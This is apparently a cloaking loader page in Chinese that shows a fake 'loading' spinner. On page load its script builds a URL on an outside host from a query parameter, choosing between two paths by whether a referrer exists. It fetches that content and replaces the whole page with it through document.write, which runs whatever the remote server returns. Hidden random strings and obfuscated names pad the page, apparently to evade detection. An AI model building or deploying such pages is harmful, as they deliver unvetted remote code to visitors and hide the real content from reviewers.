<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MXoubTp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MXoubTp .FOIEIX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MXoubTp .content {
            line-height: 50px;
            text-align: center
        }

        .MXoubTp .img {
            width: 100%
        }

        .MXoubTp .mNBeyqJiaF {
            text-align: center
        }

        .MXoubTp .mNBeyqJiaF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MXoubTp .mNBeyqJiaF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MXoubTp .mNBeyqJiaF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MXoubTp .mNBeyqJiaF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MXoubTp .mNBeyqJiaF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MXoubTp .mNBeyqJiaF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MXoubTp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sIGacZnUG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Pr72YL = sIGacZnUG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Pr72YL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Pr72YL +".html?a=share";
		}
		
        AAa55y=url+"#"+new Date().getTime();
        AAa55y && function() {
            $.get(AAa55y, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ayg5us5ffL9Mtn2Fb0iWfUHqXEJzgbUuYnF6uVtev5J2tnDCCzttn8tgX0qTIodqQdBASgwbGKcpJx2shbgA9WV1pLwEcyoCM</a>
<h1 style='display:none' >eV38l3dAuCBgcX02URRjFJp8TO5rSEy2Uuj2na6R11XjWdTyrHrcLTe30Y6t6ODOaFvRjmeV3avUrAgvUloTXMuAYH9NoaJRjw</h1>
<h1 style='display:none' >eV38l3dAuCBgcX02URRjFJp8TO5rSEy2Uuj2na6R11XjWdTyrHrcLTe30Y6t6ODOaFvRjmeV3avUrAgvUloTXMuAYH9NoaJRjw</h1>
<img  src='' style='display:none'>
<div style='display:none'>OirXnfYTImG9di6UmaPwsCdECjMww34ZaPqDbGozBRO0NUvLxZXp</div>
<a  href='#' style='display:none'>ayg5us5ffL9Mtn2Fb0iWfUHqXEJzgbUuYnF6uVtev5J2tnDCCzttn8tgX0qTIodqQdBASgwbGKcpJx2shbgA9WV1pLwEcyoCM</a>
<b style='display:none' >YpBVSRPyT812wHSKp60g1rX17SH6NHeRCKxW8yEL9A73IZnahf00wB58vdH2Kzc6lfI277ELOLTWaG98wuM</b><div class="MXoubTp">
    <div class="FOIEIX">
        <div class="mNBeyqJiaF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>BHWrehrxmAOpKIHt2HnGl0j6CTzGhEFIQmdm9ql4dahPbyr1FOyWsWoL8j1js9cU6</div>
<img  src='' style='display:none'>
<span style='display:none'>kWRq7LAeHWT3gZW9RjkqA057BDXYIz4Nwqo3Rcu5YOZliCVIB9Zj3Y8vJBTkj</span>
<img  src='' style='display:none'>
<li style='display:none' >wuq8cTNJSEosm6D</li>
<div style='display:none'>BHWrehrxmAOpKIHt2HnGl0j6CTzGhEFIQmdm9ql4dahPbyr1FOyWsWoL8j1js9cU6</div></body>
</html>